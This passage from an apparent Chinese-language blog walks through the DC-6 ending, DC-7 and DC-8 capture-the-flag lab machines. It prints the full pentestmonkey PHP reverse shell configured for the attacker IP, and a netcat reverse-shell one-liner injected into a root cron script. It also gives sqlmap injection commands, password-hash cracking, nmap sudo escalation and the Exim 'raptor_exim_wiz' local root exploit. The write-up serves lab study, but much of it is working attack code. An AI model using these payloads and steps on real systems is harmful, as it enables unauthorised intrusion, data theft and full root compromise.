<pre><code>jens@dc-6:~$ sudo nmap nmap --interactive+
!sh
#
</code></pre><p>高版本需要插件提权</p>
<pre><code>jens@dc-6:~$ echo &#39;os.execute(&quot;/bin/sh&quot;)&#39; &gt; TE.nse
jens@dc-6:~$ sudo nmap --script=/home/jens/TE.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2019-09-26 11:25 AEST
# python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;    #执行但没有回显
root@dc-6:/home/jens# id
uid=0(root) gid=0(root) groups=0(root)
</code></pre><p>查找并查看flag</p>
<pre><code>root@dc-6:/home/jens# find / -name *flag*
...
/root/theflag.txt

root@dc-6:/home/jens# cat /root/theflag.txt

Yb        dP 888888 88     88         8888b.   dP&quot;Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88&quot;&quot;   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88&quot;&quot;   `&quot;&#39; 
   YP  YP    888888 88ood8 88ood8     8888Y&quot;   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
</code></pre><h1 id="DC-7"><a href="#DC-7" class="headerlink" title="DC-7"></a>DC-7</h1><h2 id="环境-2"><a href="#环境-2" class="headerlink" title="环境"></a>环境</h2><p>虚拟机平台：VMware Workstation Pro</p>
<p>攻击机：Kali（IP：192.168.43.84）</p>
<p>靶机：DC-7（IP：192.168.43.29）</p>
<h2 id="渗透测试-2"><a href="#渗透测试-2" class="headerlink" title="渗透测试"></a>渗透测试</h2><p><code>nmap</code>扫描IP，开放<code>22</code>和<code>80</code>端口</p>
<pre><code>root@Knlvre:~# nmap -p- -A 192.168.43.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-27 09:36 CST
Nmap scan report for bogon (192.168.43.29)
Host is up (0.0035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:BB:F1:42 (VMware)
Device type: general purpose
</code></pre><p>访问80端口，发现是<code>Drupal框架</code>。第一时间想到<code>MSF</code>，搜索<code>drupal</code>，利用了几个最新的模块后都没能成功拿到shell。回到网页看提示</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-1.png" alt="7-1"></p>
<blockquote>
<p>Welcome to DC-7</p>
<p>DC-7 introduces some “new” concepts, but I’ll leave you to figure out what they are.  :-)</p>
<p>While this challenge isn’t all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won’t succeed.</p>
<p>What you will have to do, is to think “outside” the box.</p>
<p>Way “outside” the box.  :-)</p>
</blockquote>
<p>注意到这里的提示<code>outside</code>和底部的<code>DC7USER</code>，这里需要<code>推特</code>搜索这个用户，然后发现这个账户有一个链接：<a href="https://github.com/Dc7User" target="_blank" rel="noopener">https:/github.com/Dc7User</a>，我没有注册，所以直接用别人的图</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-2.png" alt="7-2"></p>
<p>打开这个连接之后，看到后看到一个叫<code>stuffdb</code>的<code>php仓库</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-3.png" alt="7-3"></p>
<p>进入之后出现了提示</p>
<blockquote>
<p>This is some “code” (yes, it’s not the greatest code, but that wasn’t the point) for the DC-7 challenge.</p>
<p>This isn’t a flag, btw, but if you have made it here, well done anyway.  :-)</p>
</blockquote>
<p>打开<code>login.php</code>没有发现账号密码，但是<code>include</code>了<code>config.php</code>，去查看看到了账号密码</p>
<pre><code class="php">
&lt;?php 
    $servername = &quot;localhost&quot;; 
    $username = &quot;dc7user&quot;; 
    $password = &quot;MdR3xOgB7#dW&quot;; 
    $dbname = &quot;Staff&quot;; 
    $conn = mysqli_connect($servername, $username, $password, $dbname); 
?&gt; 

</code></pre>
<p>拿到上面的账号密码之后，想到刚才扫描端口有看到开放<code>22</code>号端口，直接拿去连接，果然成功</p>
<pre><code> fingerprint is SHA256:J5aG8w2iY0G0Nh3p4L+WzXXaQ7O1GjFTlfAYwkBIbM4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added &#39;192.168.43.29&#39; (ECDSA) to the list of known hosts.
dc7user@192.168.43.29&#39;s password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
...
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
</code></pre><p>查看当前目录，发现了邮箱记录<code>mbox</code>，查看</p>
<pre><code>dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cat mbox
...
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: &lt;root@dc-7&gt;
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
    (envelope-from &lt;root@dc-7&gt;)
    id 1i3O0y-0000Ed-To
    for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron &lt;root@dc-7&gt; /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: &lt;PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin&gt;
X-Cron-Env: &lt;SHELL=/bin/sh&gt;
X-Cron-Env: &lt;HOME=/root&gt;
X-Cron-Env: &lt;LOGNAME=root&gt;
Message-Id: &lt;E1i3O0y-0000Ed-To@dc-7&gt;
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove &#39;/home/dc7user/backups/*&#39;: No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]
...
</code></pre><p>刚开始关注到这个<code>backups/website.sql</code>，查看之后发现是<code>gpg加密文件</code>，就先不去看。再次关注到邮件的<code>Subject: Cron &lt;root@dc-7&gt; /opt/scripts/backups.sh</code>，查看该文件</p>
<pre><code>dc7user@dc-7:/opt/scripts$ cat backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
</code></pre><p>关注到这个<code>drush</code>命令，是<code>drupal框架</code>中用来做一些配置的命令，它可以改变用户名密码，格式如下：</p>
<pre><code>drush user-password admin --password=&quot;new_pass&quot;
</code></pre><p>切换到<code>/var/www/html</code>下，用<code>drush</code>试着改变admin的密码，修改成功</p>
<pre><code>dc7user@dc-7:/opt/scripts$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password=&quot;123456&quot;
Changed password for admin
</code></pre><p>回到浏览器，用admin登录，成功</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-4.png" alt="7-4"></p>
<p>进来后<code>Manage -&gt; Extend -&gt; List -&gt; Install new module</code>，进入安装新插件的页面</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-5.png" alt="7-5"></p>
<p>从下面的网页中下载插件<code>php-8.x-1.0.tar.gz</code>，然后点击<code>Install</code>上传到靶机上</p>
<pre><code>https://www.drupal.org/project/php
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-6.png" alt="7-6"></p>
<p>上传成功页面中，点击<code>Enable newly added modules</code>，前往激活插件</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-7.png" alt="7-7"></p>
<p>点开<code>FILTERS</code>选项卡，勾选<code>PHP Filter</code>，然后点击下方的<code>Install</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/7-8.png" alt="7-8"></p>
<p>现在回到主页，点击在左边的Tools栏中点击<code>Add content -&gt; Basic page</code></p>
<p>在<code>Body</code>栏内写入一个反向shell</p>
<pre><code>&lt;?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = &quot;1.0&quot;;
$ip = &#39;192.168.43.84&#39;;  // CHANGE THIS
$port = 3737;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = &#39;uname -a; w; id; /bin/sh -i&#39;;
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists(&#39;pcntl_fork&#39;)) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit(&quot;ERROR: Can&#39;t fork&quot;);
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit(&quot;Error: Can&#39;t setsid()&quot;);
        exit(1);
    }

    $daemon = 1;
} else {
    printit(&quot;WARNING: Failed to daemonise.  This is quite common and not fatal.&quot;);
}

// Change to a safe directory
chdir(&quot;/&quot;);

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit(&quot;$errstr ($errno)&quot;);
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;),  // stdin is a pipe that the child will read from
   1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;),  // stdout is a pipe that the child will write to
   2 =&gt; array(&quot;pipe&quot;, &quot;w&quot;)   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit(&quot;ERROR: Can&#39;t spawn shell&quot;);
    exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won&#39;t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit(&quot;Successfully opened reverse shell to $ip:$port&quot;);

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit(&quot;ERROR: Shell connection terminated&quot;);
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit(&quot;ERROR: Shell process terminated&quot;);
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process&#39;s STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit(&quot;SOCK READ&quot;);
        $input = fread($sock, $chunk_size);
        if ($debug) printit(&quot;SOCK: $input&quot;);
        fwrite($pipes[0], $input);
    }

    // If we can read from the process&#39;s STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit(&quot;STDOUT READ&quot;);
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit(&quot;STDOUT: $input&quot;);
        fwrite($sock, $input);
    }

    // If we can read from the process&#39;s STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit(&quot;STDERR READ&quot;);
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit(&quot;STDERR: $input&quot;);
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we&#39;ve daemonised ourself
// (I can&#39;t figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print &quot;$string\n&quot;;
    }
}

?&gt;
</code></pre><p>现在本地打开监听，然后点击<code>Preview</code>，成功拿到shell</p>
<pre><code>root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 60104
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 13:28:32 up  2:52,  1 user,  load average: 0.01, 0.06, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dc7user  pts/0    192.168.43.84    12:33   34:56   0.25s  0.25s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can&#39;t access tty; job control turned off

$ python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;

www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre><p>在确认无其他可利用信息之后，查看最初的<code>backups.sh</code>的权限</p>
<pre><code>www-data@dc-7:/opt/scripts$ ls -l
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 backups.sh
</code></pre><p>文件拥有者为<code>root</code>，而root用户在<code>www-data组</code>内，说明我们当前的<code>www-data</code>用户拥有对该文件的所有权限（r、w、x）</p>
<p>现在就可以<code>滥用&quot;写&quot;权限</code>来完成提权，借助工具<code>msfvenom</code>，Kali端输入如下命令</p>
<pre><code>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373 R
</code></pre><p>等待一段时间之后，<code>msfvenom</code>就会返回一段命令</p>
<pre><code>root@Knlvre:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/bqro; nc 192.168.43.84 7373 0&lt;/tmp/bqro | /bin/sh &gt;/tmp/bqro 2&gt;&amp;1; rm /tmp/bqro
</code></pre><p>nc监听<code>7373</code>端口</p>
<pre><code>root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...
</code></pre><p>然后复制刚才msfvenom返回的最后一行，加上<code>引号</code>，前面加<code>echo</code>，后面加<code>&gt;&gt; backups.sh</code>。然后在刚才拿到的靶机的shell中执行如下命令，然后什么都不用做了，等待连接就行</p>
<pre><code>echo &quot;mkfifo /tmp/bqro; nc 192.168.43.84 7373 0&lt;/tmp/bqro | /bin/sh &gt;/tmp/bqro 2&gt;&amp;1; rm /tmp/bqro&quot; &gt;&gt; backups.sh
</code></pre><p>马上返回了<code>root</code>的shell，拿下flag</p>
<pre><code>root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 55244
id
uid=0(root) gid=0(root) groups=0(root)


cd /root
ls
theflag.txt
cat theflag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  &quot;Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88&quot;&quot;88b 888 &quot;88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      &quot;   &quot;   &quot;   &quot;  
888P     Y888  &quot;Y8888  888 888      8888888P&quot;   &quot;Y88P&quot;  888  888  &quot;Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I&#39;m sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
</code></pre><h1 id="DC-8"><a href="#DC-8" class="headerlink" title="DC-8"></a>DC-8</h1><h2 id="环境-3"><a href="#环境-3" class="headerlink" title="环境"></a>环境</h2><p>虚拟机平台：VMware Workstation Pro</p>
<p>攻击机：Kali（IP：192.168.43.84或192.168.0.111）</p>
<p>靶机：DC-8（IP：192.168.43.165或192.168.0.112）</p>
<h2 id="渗透测试-3"><a href="#渗透测试-3" class="headerlink" title="渗透测试"></a>渗透测试</h2><p><code>nmap</code>扫描IP，开放<code>22</code>和<code>80</code>端口，访问80端口，还是<code>drupal框架</code></p>
<p>在点击左侧<code>Details</code>栏时，发现<code>URL</code>中的<code>nid</code>在改变</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-1.png" alt="8-1"></p>
<p>添加单引号后报错，直接给执行的语句，发现是整形注入</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-2.png" alt="8-2"></p>
<p><code>sqlmap</code>跑，直接跑出了数据库</p>
<pre><code>sqlmap -u http://192.168.43.165/?nid=1 --dbs --batch
</code></pre><blockquote>
<p>d7db<br>information_schema</p>
</blockquote>
<pre><code>sqlmap -u http://192.168.43.165/?nid=1 -D d7db --tables --batch
</code></pre><blockquote>
<p>…</p>
<p>users</p>
<p>users_roles</p>
<p>…</p>
</blockquote>
<p>选择<code>users</code>表，爆出<code>admin</code>的密码</p>
<pre><code>sqlmap -u http://192.168.43.165/?nid=1 -D d7db -T users --dump --batch
</code></pre><table>
<thead>
<tr>
<th>uid</th>
<th>name</th>
<th>pass</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>admin</td>
<td>$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z</td>
</tr>
<tr>
<td>2</td>
<td>john</td>
<td>$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF</td>
</tr>
</tbody>
</table>
<p><code>john</code>爆破密码（admin的没有出来，john的出来了）</p>
<pre><code># vi password_dc8.txt
# 填入$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
# john password_dc8.txt

root@Knlvre:~# vi password_dc8.txt 
root@Knlvre:~# john password_dc8.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Proceeding with single, rules:Single
Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
turtle           (?)
1g 0:00:00:11 DONE 2/3 (2019-09-27 16:09) 0.08912g/s 99.10p/s 99.10c/s 99.10C/s tucker..utopia
Use the &quot;--show&quot; option to display all of the cracked passwords reliably
Session completed
</code></pre><p><code>dirsearch</code>扫描登录目录，扫到<code>/user</code>，登录<code>john</code>的账号成功。点击上面的<code>Contact Us</code>，切换界面后点击<code>Webform -&gt; form settings</code>，选择<code>PHP code</code>，然后填入之前用的<code>reverse shell</code>（注意：在shell前面加上任意字符串，然后记得修改地址和端口），点击提交</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-3.png" alt="8-3"></p>
<p>先开启监听</p>
<pre><code>root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
</code></pre><p>然后回到<code>Contact us</code>主页面，随意填写基本内容，然后提交</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-4.png" alt="8-4"></p>
<p>再次回到Terminal，就拿到了shell。查找具有<code>SUID</code>权限的文件</p>
<pre><code>$ python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;

www-data@dc-8:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-8:/$ find / -perm -4000 2&gt;/dev/null
find / -perm -4000 2&gt;/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
</code></pre><p>注意这个<code>exim4</code>，利用它来提权，查看版本</p>
<pre><code>www-data@dc-8:/$ exim4 --version | head -1
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
</code></pre><p>在<code>Exploit Database</code>里搜索<code>exim</code>，利用这篇：<a href="https://www.exploit-db.com/exploits/46996" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/46996</a></p>
<p>由于<code>www-data</code>用户在当前目录下无写权限，所以切换到<code>/tmp</code>目录下，因为有写权限</p>
<pre><code>www-data@dc-8:/$ ls -l
...
drwxr-xr-x   2 root root  4096 Sep  5 00:23 srv
dr-xr-xr-x  13 root root     0 Sep 30 01:45 sys
drwxrwxrwt   2 root root  4096 Oct  1 07:42 tmp
drwxr-xr-x  10 root root  4096 Sep  5 00:23 usr
drwxr-xr-x  12 root root  4096 Sep  5 00:32 var
...
</code></pre><p>可以直接<code>wget</code>刚才的地址，也可以下载到<code>Kali</code>上，然后开启临时Web服务下载到靶机上，但是当我<code>./</code>执行时一直报错：</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-5.png" alt="8-5"></p>
<pre><code>www-data@dc-8:/tmp$ wget http://192.168.0.111:7373/46996.sh
--2019-10-01 08:16:21--  http://192.168.0.111:7373/46996.sh
Connecting to 192.168.0.111:7373... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3706 (3.6K) [text/x-sh]
Saving to: &#39;46996.sh&#39;

46996.sh            100%[===================&gt;]   3.62K  --.-KB/s    in 0s      

2019-10-01 08:16:21 (28.9 MB/s) - &#39;46996.sh&#39; saved [3706/3706]

www-data@dc-8:/tmp$ ls
46996.sh

www-data@dc-8:/tmp$ chmod 777 46996.sh

www-data@dc-8:/tmp$ ./46996.sh
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory
</code></pre><p>所以只能直接用<code>vi</code>命令直接写：点击如下图位置，复制弹出的内容，然后直接在靶机中新建文件，写入其中</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/8-6.png" alt="8-6"></p>
<pre><code>www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ vi raptor_exim_wiz.sh    #写入

www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh
</code></pre><p>按照文档内的<code>Usage</code>，有两种方法来执行该文件</p>
<pre><code># Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
</code></pre><p>尝试过程中，第一种方法提权失败</p>
<pre><code>www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - &quot;The Return of the WIZard&quot; LPE exploit
Copyright (c) 2019 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:26:09 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with &quot;.&quot; on a line by itself
250 OK id=1iF47N-0000O7-Uz
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Oct  1 08:26 /tmp/pwned
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre><p>尝试第二种方式时成功了，直接拿到了<code>root</code>权限，拿下flag</p>
<p>Ps:此处当然也可以反弹shell到Kali上</p>
<pre><code>www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - &quot;The Return of the WIZard&quot; LPE exploit
Copyright (c) 2019 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:27:59 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with &quot;.&quot; on a line by itself
250 OK id=1iF499-0000Oj-KW
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open

id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)

cd /root

ls
flag.txt

cat flag.txt

Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  &quot;Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88&quot;&quot;88b 888 &quot;88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      &quot;   &quot;   &quot;   &quot;
888P     Y888  &quot;Y8888  888 888      8888888P&quot;   &quot;Y88P&quot;  888  888  &quot;Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I&#39;m also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
</code></pre><hr>
<p><strong>Reference</strong></p>
<p><a href="https://www.anquanke.com/post/id/178958" target="_blank" rel="noopener">https://www.anquanke.com/post/id/178958</a></p>
<p><a href="http://lanbainan.cn/2019/05/30/2019-05-30/" target="_blank" rel="noopener">http://lanbainan.cn/2019/05/30/2019-05-30/</a></p>
<p><a href="https://diaryof0x41.wordpress.com/2019/05/29/vulnhub-dc-6-walkthrough/" target="_blank" rel="noopener">https://diaryof0x41.wordpress.com/2019/05/29/vulnhub-dc-6-walkthrough/</a></p>
<p><a href="https://www.hackingarticles.in/dc7-vulnhub-walkthrough/" target="_blank" rel="noopener">https://www.hackingarticles.in/dc7-vulnhub-walkthrough/</a></p>
